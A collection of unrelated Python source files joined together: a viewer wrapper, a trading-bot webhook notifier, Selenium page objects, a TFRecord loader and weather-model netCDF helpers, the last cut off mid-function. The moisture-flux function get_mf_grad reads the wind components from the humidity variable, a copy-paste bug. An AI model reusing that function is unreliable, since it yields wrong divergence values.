"""The Galaxy Tool Shed application."""
from galaxy.web.framework import url_for
from galaxy.web.framework.decorators import expose
__all__ = ("url_for", "expose")
|
import numpy as np
from traits.api import Instance, Float, Enum, Any, List, on_trait_change, Event, Str, Property, Button
from traitsui.api import View, UItem, VSplit, CustomEditor, HSplit, Group, VGroup, HGroup, Label, ListEditor, \
EnumEditor
from collections import OrderedDict
from pyqtgraph.Qt import QtGui
from pyqtgraph.colormap import listMaps, get as get_colormap
from .helpers import PersistentWindow, CurveManager
from .h5scroller import FastScroller
from .curve_collections import PlotCurveCollection
from .modules import *
def setup_qwidget_control(parent, editor):
widget = editor.object.graph
return widget
class VisWrapper(PersistentWindow):
graph = Instance(QtGui.QWidget)
x_scale = Float
_y_spacing_enum = Enum(200, [0, 20, 50, 100, 200, 500, 1000, 2000, 5000, 'entry'])
_y_spacing_entry = Float(0.0)
auto_space = Button('Auto y-space')
auto_clim = Button('Auto colorbar')
colormap = Enum('coolwarm', listMaps(source='matplotlib'))
y_spacing = Property
vis_rate = Float
chan_map = Any
region = Event
clear_selected_channels = Button('Clear selected')
curve_editor_popup = Button('Curve settings')
# _plot_overlays = List(Str)
# active_channels_set = Str('all')
curve_manager = Instance(CurveManager)
modules = List([IntervalTraces,
AnimateInterval,
IntervalSpectrum,
IntervalSpectrogram,
SpatialVariance])
recording = Str
def __init__(self, qtwindow: FastScroller, **traits):
self._qtwindow = qtwindow
        # Intercept the "y_spacing" keyword: callers may pass it even though the
        # "y_spacing" trait on this class is a read-only Property, so route the
        # value through the writable enum trait instead.
dy = traits.pop('y_spacing', 100)
traits['_y_spacing_enum'] = dy
traits['vis_rate'] = 1 / qtwindow.curve_manager.source_curve.dx
traits['curve_manager'] = qtwindow.curve_manager
traits['graph'] = qtwindow.win
super(VisWrapper, self).__init__(**traits)
self._change_colormap()
# self._plot_overlays = ['all', 'selected']
# self.overlay_lookup = dict(all=qtwindow.curve_collection,
# selected=qtwindow.selected_curve_collection)
qtwindow.region.sigRegionChanged.connect(self._region_did_change)
qtwindow.curve_manager.source_curve.vis_rate_changed.connect(self._follow_vis_rate)
self._make_modules()
# This is here only to announce to traits callbacks that the region has changed
def _region_did_change(self):
self.region = True
def _follow_vis_rate(self, rate):
self.vis_rate = rate
def _make_modules(self):
mods = self.modules[:]
self.modules_by_name = OrderedDict()
for m in mods:
module = m(parent=self, chan_map=self.chan_map, curve_manager=self.curve_manager)
self.modules_by_name[module.name] = module
self.modules = list(self.modules_by_name.values())
def _get_y_spacing(self):
if self._y_spacing_enum == 'entry':
return float(self._y_spacing_entry)
else:
return float(self._y_spacing_enum)
def _auto_space_fired(self):
        y = self.curve_manager.source_curve.current_data(visible=True)[1]
        # Spacing = a quarter of the median peak-to-peak amplitude, V -> uV
        dy = np.median(y.ptp(axis=1)) * 1e6 * 0.25
if round(dy) >= 1:
dy = round(dy)
self._y_spacing_enum = 'entry'
self._y_spacing_entry = dy
def _auto_clim_fired(self):
image = self._qtwindow.img.image
mn, mx = np.nanpercentile(image, [2, 98])
        # Keep one-signed limits as-is; if the limits straddle zero (bipolar
        # data), make them symmetric about zero
        if mn * mx > 0:
            limits = mn, mx
        else:
            mx = max(np.abs(mn), np.abs(mx))
            limits = -mx, mx
self._qtwindow.cb.setLevels(values=limits)
@on_trait_change('_y_spacing_enum')
def _change_spacing(self):
self._qtwindow.update_y_spacing(self.y_spacing * 1e-6)
@on_trait_change('_y_spacing_entry')
def _change_spacing_from_entry(self):
# only change data if we're in entry mode
if self.y_spacing == self._y_spacing_entry:
self._change_spacing()
def _clear_selected_channels_fired(self):
self.curve_manager.curves_by_name('selected').set_selection(None)
def _curve_editor_popup_fired(self):
# curve_tool = CurveColorSettings(self.overlay_lookup)
curve_tool = self.curve_manager
v = curve_tool.default_traits_view()
v.kind = 'live'
curve_tool.edit_traits(view=v)
@on_trait_change('colormap')
def _change_colormap(self):
cmap = get_colormap(self.colormap, source='matplotlib')
self._qtwindow.cb.setCmap(cmap)
# self._qtwindow.img.setLookupTable(cmap)
def default_traits_view(self):
ht = 1000
v = View(
VSplit(
UItem('graph',
editor=CustomEditor(setup_qwidget_control),
resizable=True,
#height=(ht-150)),
height=0.85),
HSplit(
Group(HGroup(VGroup(Label('Trace spacing (uV)'),
UItem('_y_spacing_enum', resizable=True),
Label('Enter spacing (uV)'),
UItem('_y_spacing_entry'),
UItem('auto_space')),
VGroup(Label('Heatmap curves'),
UItem('object.curve_manager.heatmap_name',
editor=EnumEditor(name='object.curve_manager._curve_names')),
Label('Color map'),
UItem('colormap'),
UItem('auto_clim'))),
HGroup(VGroup(UItem('clear_selected_channels'),
UItem('curve_editor_popup')),
VGroup(Label('Interactive curves'),
UItem('object.curve_manager.interactive_name',
editor=EnumEditor(name='object.curve_manager._curve_names')))),
HGroup(Label('Vis. sample rate'), UItem('vis_rate', style='readonly'))),
UItem('modules', style='custom', resizable=True,
editor=ListEditor(use_notebook=True,
deletable=False,
dock_style='tab',
page_name='.name'),
# height=-150
),
)
),
width=1200,
height=ht,
resizable=True,
title=self.recording
)
return v
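# A minimal sketch (not part of the original module) of the auto y-spacing
# arithmetic in VisWrapper._auto_space_fired above: a quarter of the median
# peak-to-peak amplitude of the visible traces, converted from volts to
# microvolts. The sample array here is hypothetical.
def _demo_auto_y_spacing():
    rng = np.random.default_rng(0)
    y = rng.normal(scale=25e-6, size=(16, 1000))  # 16 hypothetical channels, in volts
    dy = np.median(np.ptp(y, axis=1)) * 1e6 * 0.25  # V -> uV, quarter of median p-p
    return round(dy) if round(dy) >= 1 else dy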
|
"""
This module manages webhook communication
"""
import logging
from typing import Any, Dict
from requests import RequestException, post
from freqtrade.enums import RPCMessageType
from freqtrade.rpc import RPC, RPCHandler
logger = logging.getLogger(__name__)
logger.debug('Included module rpc.webhook ...')
class Webhook(RPCHandler):
""" This class handles all webhook communication """
def __init__(self, rpc: RPC, config: Dict[str, Any]) -> None:
"""
Init the Webhook class, and init the super class RPCHandler
:param rpc: instance of RPC Helper class
:param config: Configuration object
:return: None
"""
super().__init__(rpc, config)
self._url = self._config['webhook']['url']
self._format = self._config['webhook'].get('format', 'form')
        if self._format not in ('form', 'json'):
            raise NotImplementedError('Unknown webhook format `{}`, possible values are '
                                      '`form` (default) and `json`'.format(self._format))
def cleanup(self) -> None:
"""
Cleanup pending module resources.
This will do nothing for webhooks, they will simply not be called anymore
"""
pass
def send_msg(self, msg: Dict[str, Any]) -> None:
""" Send a message to telegram channel """
try:
if msg['type'] == RPCMessageType.BUY:
valuedict = self._config['webhook'].get('webhookbuy', None)
elif msg['type'] == RPCMessageType.BUY_CANCEL:
valuedict = self._config['webhook'].get('webhookbuycancel', None)
elif msg['type'] == RPCMessageType.BUY_FILL:
valuedict = self._config['webhook'].get('webhookbuyfill', None)
elif msg['type'] == RPCMessageType.SELL:
valuedict = self._config['webhook'].get('webhooksell', None)
elif msg['type'] == RPCMessageType.SELL_FILL:
valuedict = self._config['webhook'].get('webhooksellfill', None)
elif msg['type'] == RPCMessageType.SELL_CANCEL:
valuedict = self._config['webhook'].get('webhooksellcancel', None)
elif msg['type'] in (RPCMessageType.STATUS,
RPCMessageType.STARTUP,
RPCMessageType.WARNING):
valuedict = self._config['webhook'].get('webhookstatus', None)
else:
raise NotImplementedError('Unknown message type: {}'.format(msg['type']))
if not valuedict:
logger.info("Message type '%s' not configured for webhooks", msg['type'])
return
payload = {key: value.format(**msg) for (key, value) in valuedict.items()}
self._send_msg(payload)
except KeyError as exc:
logger.exception("Problem calling Webhook. Please check your webhook configuration. "
"Exception: %s", exc)
def _send_msg(self, payload: dict) -> None:
"""do the actual call to the webhook"""
try:
if self._format == 'form':
post(self._url, data=payload)
elif self._format == 'json':
post(self._url, json=payload)
else:
raise NotImplementedError('Unknown format: {}'.format(self._format))
except RequestException as exc:
logger.warning("Could not call webhook url. Exception: %s", exc)
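# A minimal usage sketch (not part of freqtrade itself; the URL and template
# field below are hypothetical). The webhook section of the configuration maps
# message types to template dicts, and send_msg() above expands each template
# value with str.format(**msg).
def _demo_webhook_config() -> Dict[str, Any]:
    return {
        'webhook': {
            'url': 'https://example.com/hook',  # hypothetical endpoint
            'format': 'json',
            'webhookstatus': {'text': 'Status: {status}'},
        }
    }
# Usage sketch, given an RPC instance `rpc`:
#   Webhook(rpc, _demo_webhook_config()).send_msg(
#       {'type': RPCMessageType.STATUS, 'status': 'running'})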
|
from apps.accounts.models import User
from selenium.webdriver.common.by import By
from functional_tests.pages.base import QcatPage
class QuestionnaireStepPage(QcatPage):
route_name = ''
LOC_BUTTON_SUBMIT = (By.ID, 'button-submit')
LOC_IMAGE_FOCAL_POINT_TARGET = (By.ID, 'id_qg_image-0-image_target')
LOC_LINK_ENTRIES = (By.XPATH, '//div[@class="link-preview"]/div')
LOC_LINK_ENTRY = (
By.XPATH,
'//div[@class="link-preview"]/div[text()="{link_text}"]')
LOC_LINK_ENTRY_REMOVE = (
By.XPATH, '(//div[@class="link-preview"])[{index}]//'
'a[@class="close"]') # 1-based!
LOC_LINK_ADD_MORE = (
By.XPATH, '//a[@data-questiongroup-keyword="{questiongroup}" and '
'@data-add-item]')
LOC_INPUT_SEARCH_LINK = (
By.XPATH, '(//div[contains(@class, "link-search") and not(contains('
'@style, "display: none;"))])[1]/input[contains(@class, '
'"link-search-field")]')
LOC_INPUT_SEARCH_USER = (
By.XPATH,
'(//input[contains(@class, "user-search-field")])[{index}]') # 1-based!
LOC_RADIO_SEARCH_USER = (
By.XPATH, '//input[@name="form-user-radio" and @value="search"]')
LOC_LOADING_SEARCH_USER = (By.CLASS_NAME, 'form-user-search-loading')
LOC_DISPLAY_SEARCH_USER = (
By.XPATH,
'//div[contains(@class, "alert-box") and contains(text(), "{name}")]')
LOC_REMOVE_SEARCH_USER = (
By.XPATH,
'//div[contains(@class, "alert-box") and contains(text(), "{name}")]/a')
LOC_BUTTON_BACK_WITHOUT_SAVING = (
By.XPATH, '//a[@class="wizard-header-back"]')
LOC_MODAL_TRANSLATION_WARNING = (By.ID, 'modal-translation-warning')
LOC_MODAL_TRANSLATION_CONFIRM_CREATE = (
By.CLASS_NAME, 'close-modal-translation-confirm-create')
LOC_BUTTON_TRANSLATION_WARNING_BACK = (
By.ID, 'modal-translation-warning-back')
LOC_BUTTON_TRANSLATION_WARNING_CONTINUE = (
By.CLASS_NAME, 'close-modal-translation-warning')
def is_focal_point_available(self):
# The script to set the focus point for the image is loaded, and the
# hidden field is in the DOM.
self.browser.execute_script("return $.addFocusPoint();")
        return self.exists_el(self.LOC_IMAGE_FOCAL_POINT_TARGET)
def enter_text(self, locator: tuple, text: str, clear: bool=False):
el = self.get_el(locator)
if clear is True:
el.clear()
el.send_keys(text)
def submit_step(self, driver, confirm_add_translation: bool=False):
elm = self.get_el(self.LOC_BUTTON_SUBMIT)
driver.execute_script("arguments[0].click();", elm)
if confirm_add_translation:
self.wait_for_modal()
elm = self.get_el(self.LOC_MODAL_TRANSLATION_CONFIRM_CREATE)
driver.execute_script("arguments[0].click();", elm)
assert self.has_success_message()
def back_without_saving(self, driver):
elm = self.get_el(self.LOC_BUTTON_BACK_WITHOUT_SAVING)
driver.execute_script("arguments[0].click();", elm)
def check_links(self, link_list: list, count: bool=True) -> bool:
found_links = []
for link in link_list:
link_el = self.get_el(
self.format_locator(self.LOC_LINK_ENTRY, link_text=link))
found_links.append(link_el)
if count is True:
return len(self.get_els(self.LOC_LINK_ENTRIES)) == len(found_links)
return True
def delete_link(self, index: int):
elm = self.get_el(
self.format_locator(self.LOC_LINK_ENTRY_REMOVE, index=index+1)
)
self.browser.execute_script("arguments[0].click();", elm)
def add_link(self, qg_keyword: str, link_name: str, add_more: bool=False):
if add_more is True:
elm = self.get_el(
self.format_locator(
self.LOC_LINK_ADD_MORE, questiongroup=qg_keyword)
)
self.browser.execute_script("arguments[0].click();", elm)
self.get_el(self.LOC_INPUT_SEARCH_LINK).send_keys(link_name)
self.select_autocomplete(self.browser, link_name)
def get_user_search_field(self, index: int=1):
return self.get_el(
self.format_locator(self.LOC_INPUT_SEARCH_USER, index=index))
def has_selected_user(self, user: User):
return self.exists_el(
self.format_locator(
self.LOC_DISPLAY_SEARCH_USER, name=user.get_display_name()))
def select_user(self, user: User, index: int=1):
search_field = self.get_user_search_field(index=index)
search_field.send_keys(user.firstname)
self.select_autocomplete(user.get_display_name())
self.wait_for(self.LOC_LOADING_SEARCH_USER, visibility=False)
def remove_selected_user(self, user: User):
self.get_el(
self.format_locator(
self.LOC_REMOVE_SEARCH_USER, name=user.get_display_name())
).click()
def has_translation_warning(self):
return self.exists_el(self.LOC_MODAL_TRANSLATION_WARNING)
def translation_warning_click_go_back(self, driver):
elm = self.get_el(self.LOC_BUTTON_TRANSLATION_WARNING_BACK)
driver.execute_script("arguments[0].click();", elm)
def translation_warning_click_continue(self, driver):
elm = self.get_el(self.LOC_BUTTON_TRANSLATION_WARNING_CONTINUE)
driver.execute_script("arguments[0].click();", elm)
#self.wait_for_modal(visibility=False)
|
import glob
from typing import Dict, Union, List
from pathlib import Path
import pandas as pd
import numpy as np
import tensorflow as tf
def load_dataset(
data_details: Dict,
batch_size: int,
file_ffps: Union[List[str], np.ndarray] = None,
data_dirs: Union[Path, List[Path]] = None,
file_filter: str = "*.tfrecord",
recursive: bool = False,
shuffle_buffer: Union[int, None] = 1_000_000,
n_open_files: int = 32,
block_size: int = 256,
n_parallel_calls: Union[int, None] = tf.data.experimental.AUTOTUNE
):
"""Performs the loading and parsing of a tensorflow dataset from
the .tfrecord files in the given directory
Parameters
----------
data_details: dictionary
Specifies how to parse the data,
see https://www.tensorflow.org/api_docs/python/tf/io/parse_example?hl=en
for more details
    batch_size: int
        Batch size; batching has to happen at this step, since parsing
        batches is much more efficient than parsing single entries
file_ffps: list of strings, optional
The files that make up the database
Either data_dirs (with file_filter) or file_ffps have to be given
data_dirs: Path, list of Path, optional
Directory that contains the .tfrecord files to use
Either data_dirs (with file_filter) or file_ffps have to be given
file_filter: str, optional
The file filter to use when searching the
specified directory for records
recursive: bool, optional
If specified then a recursive search is performed in each data_dir using the
specified file_filter.
No effect if file_ffps are given
    shuffle_buffer: int, optional
        Size of the shuffle buffer (in number of entries) to use,
        defaults to 1 million.
        If set to None, no shuffling is performed; however, data is still
        loaded from multiple .tfrecord files at once (due to interleave),
        so entries still come out loosely mixed across files
n_open_files: int, optional
How many .tfrecord files to read concurrently using the interleave
function (https://www.tensorflow.org/api_docs/python/tf/data/Dataset#interleave)
    block_size: int, optional
        Determines how many records are loaded from a .tfrecord file in one
        interleave cycle.
        The default value should be fine; increasing it speeds up loading,
        but if the shuffle buffer is not sized appropriately this may
        result in badly shuffled data
n_parallel_calls: int, optional
Number of parallel calls to use for interleave and parsing,
default is tf.data.experimental.AUTOTUNE, which lets tensorflow determine the
best number of calls to use.
If sequential processing is required, then set this to None
Returns
-------
tf.data.Dataset
Note: The dataset will not return single training samples,
but instead batches of batch_size!
"""
    # Either data_dirs (with file_filter) or file_ffps have to be given
    assert file_ffps is not None or data_dirs is not None, \
        "Either file_ffps or data_dirs has to be given"
if file_ffps is None:
file_patterns = (
[str(cur_dir / file_filter) for cur_dir in data_dirs]
if isinstance(data_dirs, list)
else [str(data_dirs / file_filter)]
)
file_ffps = np.concatenate(
[
glob.glob(cur_file_pattern, recursive=recursive)
for cur_file_pattern in file_patterns
]
)
def _parse_fn(example_proto):
parsed = tf.io.parse_example(example_proto, data_details)
return parsed
# 1) Create a dataset from the files, the shuffle option
# means that the order of the files is shuffled every repeat (i.e. epoch) of the
# dataset
ds = tf.data.Dataset.from_tensor_slices(file_ffps).shuffle(
len(file_ffps), reshuffle_each_iteration=True
)
    # 2) Use interleave to cycle through the n_open_files .tfrecord files,
    # feeding serialized samples into the shuffle buffer and opening the
    # next .tfrecord file once one runs out of samples
    # 3) Shuffle the samples in the buffer, adding more into the buffer
    # as samples are removed
    # 4) Batch
    # 5) Parse each batch
ds = ds.interleave(
lambda f: tf.data.TFRecordDataset(f),
num_parallel_calls=n_parallel_calls,
cycle_length=n_open_files,
block_length=block_size,
deterministic=False,
)
if shuffle_buffer is not None:
ds = ds.shuffle(shuffle_buffer)
ds = ds.batch(batch_size).map(
_parse_fn, num_parallel_calls=n_parallel_calls
)
return ds
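# A minimal usage sketch (the feature names and directory below are
# hypothetical): data_details follows the tf.io.parse_example feature-spec
# convention, mapping each feature name to e.g. a tf.io.FixedLenFeature.
def _demo_load_dataset():
    data_details = {
        "x": tf.io.FixedLenFeature([10], tf.float32),  # hypothetical features
        "y": tf.io.FixedLenFeature([], tf.float32),
    }
    return load_dataset(
        data_details,
        batch_size=64,
        data_dirs=Path("/tmp/records"),  # hypothetical directory
        shuffle_buffer=10_000,
    )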
def load_tfrecord(record_ffp: str, data_details: Dict, batch_size: int = 10_000):
"""
Loads a single tfrecord file as a dictionary
Parameters
----------
record_ffp: string
Path to the .tfrecord file
data_details: dictionary
Contains the data details required for loading
batch_size: int, optional
        The batch size used for loading; this has to exceed the number of
        samples in the .tfrecord file
Returns
-------
dictionary:
Data from the specified .tfrecord file
"""
ds = tf.data.TFRecordDataset(filenames=[record_ffp])
def _parse_fn(example_proto):
parsed = tf.io.parse_example(example_proto, data_details)
return parsed
# Slight hack, just want to parse the whole record in one go,
# not sure how to do this without batching...
ds = ds.batch(batch_size).map(
_parse_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return next(ds.as_numpy_iterator())
def load_tfrecord_df(record_ffp: str, data_details: Dict, batch_size: int = 10_000):
"""
Loads a single tfrecord file as a dataframe
Parameters
----------
record_ffp: string
Path to the .tfrecord file
data_details: dictionary
Contains the data details required for loading
batch_size: int, optional
        The batch size used for loading; this has to exceed the number of
        samples in the .tfrecord file
Returns
-------
dataframe:
Data from the specified .tfrecord file
"""
data = load_tfrecord(record_ffp, data_details, batch_size=batch_size)
df = pd.DataFrame.from_dict(data)
    df["id"] = df["id"].str.decode("UTF-8")
df = df.set_index("id")
return df
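# A small usage sketch for the single-file loaders (path and feature names are
# hypothetical). Note that load_tfrecord_df assumes the record has an "id"
# feature holding byte strings, which becomes the dataframe index.
def _demo_load_tfrecord_df():
    data_details = {
        "id": tf.io.FixedLenFeature([], tf.string),
        "y": tf.io.FixedLenFeature([], tf.float32),
    }
    return load_tfrecord_df("/tmp/records/demo.tfrecord", data_details)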
|
"""Define the aiowatttime package."""
from .client import Client # noqa
|
import numpy as np
from netCDF4 import Dataset
from datetime import datetime
from datetime import timedelta
import os
import sys
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from scipy import ndimage
import matplotlib.colors as mcolors
p00 = 100000.00 # Pa (reference pressure)
Rd = 287.04
Rv = 461.51
epsilon = Rd / Rv
cp = 1004.0
grav = 9.81
r2DX = 0.5 / (18000.0) # 1 / (2 * 18-km grid spacing) [1/m]
rDX = 1.0 / (18000.0) # 1 / (18-km grid spacing) [1/m]
t0 = 273.15
def convolve_ave( var2d, kernel):
return( ndimage.convolve( var2d, kernel, mode='reflect' ) )
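# Note: convolve_ave only acts as a moving average if the kernel is
# normalized. A minimal sketch with a hypothetical 3x3 uniform kernel:
def _demo_convolve_ave():
    kernel = np.ones((3, 3)) / 9.0 # normalized averaging kernel
    var2d = np.arange(25, dtype=float).reshape(5, 5)
    return convolve_ave(var2d, kernel)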
def get_lonlat( INFO, stime=datetime(2018,7,1), ):
mem = str(1).zfill(4)
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
with Dataset( fn, "r", format="NETCDF4") as nc:
lon = nc.variables["lon"][:]
lat = nc.variables["lat"][:]
return( lon, lat )
def prep_proj_multi( METHOD, axs, res="c", ll_lon=120, ur_lon=150, ll_lat=20, ur_lat=50,
fs=10,zorder=2,contc='burlywood',cont_alp=0.2, cc='k' ):
# print("proj")
ddeg = 0.2 # deg
lat2 = 40.0
blon = 138.0
blat = 36.3
m_l = []
    #contc = 'lightgrey'
    pdlat = 5.0
    pdlon = 5.0
    #pdlat = 1.0
    #pdlon = 2.0
    lc = 'k'
    lw = 0.1
for ax in axs:
m = Basemap(projection=METHOD,resolution = res,
llcrnrlon = ll_lon,llcrnrlat = ll_lat,
urcrnrlon = ur_lon,urcrnrlat = ur_lat,
lat_0 = blat, lat_1 = lat2,
lat_2 = lat2, lon_0 = blon,
ax = ax)
m_l.append(m)
m.drawcoastlines(linewidth = 0.5, color = cc, zorder=zorder)
m.fillcontinents(color=contc,lake_color='w', zorder=0, alpha =cont_alp)
m.drawparallels(np.arange(0,70,pdlat),labels=[1,0,0,0],fontsize=fs,color=lc,linewidth=lw)
m.drawmeridians(np.arange(0,180,pdlon),labels=[0,0,0,1],fontsize=fs,color=lc,linewidth=lw)
return( m_l )
def get_arain_t( INFO, stime=datetime(2018,7,1),
adt=timedelta(hours=24), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
adts = adt.total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
dt = int( adts / ( fts[2] - fts[1] ) )
        rain_ = nc.variables["PREC"][:,:,:]*21600 # rate * 21600 s (6-h accumulation)
rain_[ rain_ < 0.0 ] = 0.0
tmax = rain_.shape[0] // dt
rain = np.zeros( (tmax, rain_.shape[1], rain_.shape[2]) )
vtime_l = [0] * tmax
tt = 0
for t, ft in enumerate(fts):
if ft == 0.0:
continue
tt = (t-1) // dt
rain[tt, :,:] += rain_[t,:,:]
vtime_l[tt] = stime + timedelta( seconds=ft )
# print( t, tt, ft )
return( rain, vtime_l )
def get_arain( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1),
adt=timedelta(hours=24), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
# print( fn )
ft_max = ( vtime - stime ).total_seconds()
ft_min = ( vtime - adt - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
# print("time", fts/3600)
idx_s = np.abs( ( fts - ft_min ) ).argmin()
idx_e = np.abs( ( fts - ft_max ) ).argmin()
#
rain = np.sum( nc.variables["PREC"][idx_s+1:idx_e+1,:,:], axis=0 )*21600
if ft_min < 0:
rain[:] = np.nan
# print( rain.shape )
# print( ft_max, ft_min, idx_s, idx_e )
# print( stime + timedelta( seconds=fts[idx_s+1]),
# stime + timedelta( seconds=fts[idx_e+1]) )
# print( fts[idx_s:idx_e]/3600)
return( rain )
def get_mslp( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
mslp = nc.variables["MSLP"][idx_e,:,:]
except:
print( "No time" )
mslp = nc.variables["MSLP"][:,:]
return( mslp )
def get_gph( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
gph = nc.variables["Gprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
gph = nc.variables["Gprs"][idx_v,:,:]
#
return( gph )
def get_prsvar( INFO, nvar="Vprs", stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
var = nc.variables[nvar][idx_e,idx_v,:,:]
except:
print( "No time" )
var = nc.variables[nvar][idx_v,:,:]
return( var )
def get_the( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
tk_ = nc.variables["Tprs"][idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_v,:,:]
    eprs_ = qv_ * hpa*1.e2 / ( epsilon + qv_ ) # vapor pressure (Pa)
    # Temperature at the lifting condensation level, Bolton (1980) Eq. 21
    tast_ = 2840.0 / (3.5 * np.log( tk_ ) - np.log( eprs_ * 0.01 ) - 4.805) + 55.0
    # Equivalent potential temperature, Bolton (1980) Eq. 43
    the = tk_ * np.power(p00 / (hpa*1.e2), 0.2854 * (1.0 - 0.28*qv_)) * np.exp(qv_ * (1.0 + 0.81 * qv_) * (3376.0 / tast_ - 2.54))
    the[ (the > 1000.0) | (the < 0.0 )] = np.nan
return( the )
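# A scalar sketch of the formulas used in get_the above (Bolton 1980,
# Eqs. 21 and 43); the parcel values here are hypothetical.
def _demo_theta_e( tk=300.0, qv=0.014, hpa=950.0 ):
    e = qv * hpa*1.e2 / ( epsilon + qv ) # vapor pressure (Pa)
    tl = 2840.0 / (3.5 * np.log( tk ) - np.log( e * 0.01 ) - 4.805) + 55.0
    return( tk * np.power(p00 / (hpa*1.e2), 0.2854 * (1.0 - 0.28*qv))
            * np.exp(qv * (1.0 + 0.81 * qv) * (3376.0 / tl - 2.54)) )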
def get_the_grad( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
the = get_the( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
if the.ndim == 2:
[ the_y, the_x ] = np.gradient( the, axis=(0,1) )
elif the.ndim == 3:
[ the_y, the_x ] = np.gradient( the, axis=(1,2) )
else:
print( "Error" )
sys.exit()
#return( the_x*r2DX, the_y*r2DX )
return( the_x*rDX, the_y*rDX )
def get_mf_grad( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
q_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
u_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
v_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
[ dqvdy, _ ] = np.gradient( q_*v_, axis=(0,1) )
[ _, dqudx ] = np.gradient( q_*u_, axis=(0,1) )
return( ( dqvdy+dqudx ) * rDX )
def get_rh( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
tk_ = nc.variables["Tprs"][idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_v,:,:]
    # Tetens' formula: saturation vapor pressure (Pa), then saturation
    # mixing ratio, then relative humidity qv/qvs
    es_ = 611.2 * np.exp( 17.67*( tk_ - t0 ) / ( tk_ - t0 + 243.5 ) )
    qvs_ = epsilon * es_ / ( hpa*1.e2 - es_ )
    rh_ = qv_ / qvs_
    rh_[ rh_ < 0.0 ] = np.nan
return( rh_ )
def get_ki( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v850 = np.abs( ( prs - 850 ) ).argmin()
idx_v700 = np.abs( ( prs - 700 ) ).argmin()
idx_v500 = np.abs( ( prs - 500 ) ).argmin()
try:
